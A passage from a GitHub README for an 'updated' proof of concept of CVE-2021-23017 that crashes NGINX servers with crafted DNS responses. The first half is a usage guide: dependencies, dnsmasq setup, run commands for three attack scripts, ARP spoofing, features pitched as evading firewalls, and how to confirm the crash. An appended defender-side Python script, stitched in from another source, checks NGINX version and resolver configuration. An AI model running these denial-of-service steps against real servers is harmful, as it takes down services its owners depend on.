vulnerability in NGINX servers (versions 0.6.18–1.20.0). The scripts aim to cause a Denial of Service (DoS) by sending malicious DNS responses, with enhancements to bypass firewalls. This is an improved version of the original PoC from [M507/CVE-2021-23017-PoC](https://github.com/M507/CVE-2021-23017-PoC) .
**Warning**: Use only with explicit written permission from the system owner. Unauthorized testing is illegal.
## Requirements
- **Environment**: Linux (e.g., Kali Linux, via Termux/virtualized setup).
- **Dependencies**:
```bash
sudo apt-get update
sudo apt-get install python3-scapy dnsmasq
pip3 install scapy requests
```
- **Network**: Same subnet as the target for ARP spoofing, or the target NGINX must use your DNS server IP.
## Installation
1. Clone the repository (the clone creates a directory named after the repository, so `cd` into that name):
```bash
git clone https://github.com/6lj/EVIL-CVE-2021-23017-Update-2025.git
cd EVIL-CVE-2021-23017-Update-2025
```
2. Set up `dnsmasq`:
```bash
sudo nano /etc/dnsmasq.conf
```
Add:
```
address=/test.example.com/192.168.1.100
```
Start:
```bash
sudo systemctl start dnsmasq
```
## What It Does
- Sends malicious DNS responses with a long domain name (`AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.test.com`) to crash the NGINX server.
- Triggers DNS queries using `curl` and `dig` to exploit the vulnerability.
- Bypasses firewalls by sending direct DNS packets and using parallel processes.
## Differences from Original
Compared to [M507/CVE-2021-23017-PoC](https://github.com/M507/CVE-2021-23017-PoC):
- **Enhanced Firewall Bypass**: Uses parallel processes (`poc1.2.3.py`) for simultaneous sniffing, DNS sending, and query triggering; the three tasks must be run together.
- **Optimized Packet Delivery**: Higher frequency of packets and queries to evade firewall filters.
- **Subnet Checking**: Verifies network compatibility for ARP spoofing, improving reliability.
## Usage
Run the three scripts together, each with the appropriate arguments (replace `<target_ip>`, `<your_dns_server_ip>`, and `<target_url>` with your own values).
### `poc.py`
```bash
python3 poc.py --dns_server <your_dns_server_ip> --iface eth0 --count 50 --target_url http://<target_url>
```
- Sniffs and responds to DNS queries.
### `poc2.py`
```bash
python3 poc2.py --target <target_ip> --dns_server <your_dns_server_ip> --iface eth0 --count 50 --target_url http://<target_url>
```
- Adds direct DNS sending and query triggering.
### `poc3.py` (Recommended)
```bash
python3 poc3.py --target <target_ip> --dns_server <your_dns_server_ip> --iface eth0 --target_url http://<target_url>
```
- Runs tasks in parallel for maximum efficiency.
### Example
```bash
python3 poc3.py --target 192.168.1.100 --dns_server 192.168.1.101 --iface eth0 --target_url http://192.168.1.100
```
## Verify Results
- Check server status:
```bash
curl -I http://<target_url>
```
- **Success**: `502 Bad Gateway` or `503 Service Unavailable` indicates a server crash.
- **Failure**: `200 OK` suggests no vulnerability or firewall blocking.
- Monitor DNS traffic:
```bash
sudo wireshark -f "udp port 53"
```
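An HTTP status code is a weak indicator: `200 OK` can mean the server is patched, or simply that the resolver never received the crafted response. The more reliable check for an administrator is whether the NGINX version falls in the affected range stated above (0.6.18 through 1.20.0) and whether the configuration actually uses the `resolver` directive, since the nginx advisory for CVE-2021-23017 states the bug is only reachable when `resolver` is configured. The script below is an added example written from the defender's side; it is not part of this repository or the original PoC. It assumes version text in the `nginx/X.Y.Z` form that `nginx -v` and the `Server:` header both use, and a plain-text `nginx.conf` where `#` starts a comment; the sample version string and configuration are constructed for the demonstration.

```python
"""Exposure check for CVE-2021-23017 from the administrator's side (added example).

Affected range taken from this README: nginx 0.6.18 through 1.20.0 inclusive.
Fixed releases per the nginx advisory: 1.20.1 and 1.21.0 (and later).
"""
import re
import subprocess

AFFECTED_MIN = (0, 6, 18)
AFFECTED_MAX = (1, 20, 0)

# Constructed sample inputs (not captured from a real host).
SAMPLE_VERSION_OUTPUT = "nginx version: nginx/1.18.0"
SAMPLE_CONF = """
http {
    # resolver 127.0.0.1;   <- commented out, must not count
    resolver_timeout 5s;    # different directive, must not count
    server {
        resolver 192.168.1.101 valid=30s;
        location / { proxy_pass http://backend; }
    }
}
"""


def parse_version(text):
    """Extract (major, minor, patch) from 'nginx version: nginx/1.18.0' or a
    'Server: nginx/1.20.0' header. Returns None when no nginx version is present."""
    m = re.search(r"nginx/(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        return None
    return tuple(int(x) for x in m.groups())


def version_in_affected_range(version):
    """Tuple comparison gives correct ordering for 0.6.18 <= v <= 1.20.0."""
    return AFFECTED_MIN <= version <= AFFECTED_MAX


def config_uses_resolver(conf_text):
    """True if an uncommented 'resolver <address...>' directive is present.
    Assumption: comments begin with '#'; 'resolver_timeout' is not a match."""
    for line in conf_text.splitlines():
        code = line.split("#", 1)[0].strip()
        if re.match(r"resolver\s+\S", code):
            return True
    return False


def assess(version_text, conf_text):
    """Combine the two checks into a single verdict string."""
    version = parse_version(version_text)
    if version is None:
        return "unknown: could not parse an nginx version from the input"
    label = ".".join(map(str, version))
    if not version_in_affected_range(version):
        return f"not affected: nginx {label} is outside 0.6.18-1.20.0"
    if not config_uses_resolver(conf_text):
        return (f"affected version {label} but no resolver directive: "
                f"bug not reachable, upgrade anyway")
    return (f"VULNERABLE: nginx {label} with resolver configured; "
            f"upgrade to 1.20.1 / 1.21.0 or later")


if __name__ == "__main__":
    # On a real host: 'nginx -v' prints its version line to stderr.
    try:
        proc = subprocess.run(["nginx", "-v"], capture_output=True, text=True)
        version_text = proc.stderr or proc.stdout
    except FileNotFoundError:
        version_text = SAMPLE_VERSION_OUTPUT  # fall back to the constructed sample
    print(assess(version_text, SAMPLE_CONF))
```

On a live host, replace `SAMPLE_CONF` with the contents of the running configuration (`nginx -T` prints the full effective config). If the verdict is `VULNERABLE`, upgrading is the fix; until then, the exposure described in this README depends on the target accepting DNS answers from an untrusted resolver, so the `resolver` directive should point only at a trusted server on a protected segment.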
**Disclaimer**: For educational purposes only. Authors are not responsible for misuse.